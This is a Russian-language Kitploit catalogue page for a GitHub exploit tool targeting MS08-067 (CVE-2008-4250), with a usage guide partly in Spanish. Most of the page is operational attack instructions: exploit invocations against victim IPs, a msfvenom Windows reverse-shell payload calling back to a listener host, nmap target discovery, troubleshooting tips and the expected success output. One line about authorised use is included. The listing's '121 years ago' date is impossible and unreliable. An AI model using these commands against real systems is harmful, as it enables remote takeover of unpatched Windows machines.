Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Exploit_MS08-067 — MS08-067 | CVE-2008-4250 | Kitploit
Инструменты/GitHubGitHub/notrustedx/exploit_ms08-067
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияШелл-кодТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubnotrustedx/exploit_ms08-067

Exploit_MS08-067

MS08-067 | CVE-2008-4250

Репозиторий
121 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Полное руководство по использованию: # Exploit MS08-067 Улучшенный

📌 Основное использование

root@kitploit:~
python3 Exploit_MS08-067.py <IP_VÍCTIMA> <VERSIÓN_OS> [OPCIONES]

🎯 Практические примеры

1. Windows XP SP0/SP1 (Порт по умолчанию 445)

root@kitploit:~
python3 Exploit_MS08-067.py 192.168.1.100 1

2. Windows 2003 SP1 English (Порт 139)

root@kitploit:~
python3 Exploit_MS08-067.py 192.168.1.150 4 -p 139

3. С пользовательским shellcode

root@kitploit:~
python3 Exploit_MS08-067.py 192.168.1.200 6 -s /ruta/mishellcode.bin
Скачать инструмент

🔍 Обязательные параметры

ПараметрОписаниеДопустимые значения
IP_VÍCTIMAIP целиЛюбой IPv4
VERSIÓN_OSВерсия уязвимой ОС1-7 (см. таблицу)

📋 Таблица поддерживаемых версий

ЗначениеОперационная системаАрхитектура
1Windows XP SP0/SP1 Universalx86
2Windows 2000 Universalx86
.........

⚙️ Дополнительные параметры

ПараметрОписаниеПо умолчанию
-p/--portПорт SMB (445/139)445
-t/--timeoutТайм-аут в секундах5
-s/--shellcodeПуть к пользовательскому shellcodeNone

🛠️ Генерация shellcode с помощью msfvenom

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.201 LPORT=4484 \
EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode \
-a x86 --platform windows

🔎 Идентификация цели

root@kitploit:~
nmap -p 139,445 --script smb-os-discovery <IP_VÍCTIMA>

🚨 Устранение распространенных проблем

Ошибка: STATUS_OBJECT_NAME_NOT_FOUND

  1. Проверьте, активна ли служба Browser:

    root@kitploit:~
    nmap -p 445 --script smb-enum-shares <IP>
    
  2. Попробуйте другой pipe (измените скрипт):

    root@kitploit:~
    # Cambiar \\pipe\\browser por \\pipe\\srvsvc
    

Shellcode не выполняется

  • Проверьте запрещенные символы: \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40
  • Используйте эту команду для проверки:
    root@kitploit:~
     msfvenom -p windows/exec CMD="calc.exe" -f raw | xxd | grep -E "00|0a|0d|5c|5f|2f|2e|40"
    

💡 Этические рекомендации

✅ Использовать только в авторизованных средах
❌ Никогда не использовать в производственных системах без разрешения

📊 Ожидаемый успешный вывод

root@kitploit:~
[*] Targeting 192.168.1.100 | OS: 1 | Port: 445
[+] Connected to 192.168.1.100 on port 445
[*] Sending exploit...
[+] Exploit finished - Check your listener!

⚠️ Примечание: Этот эксплойт не работает на системах, которые были пропатчены обновлением MS08-067.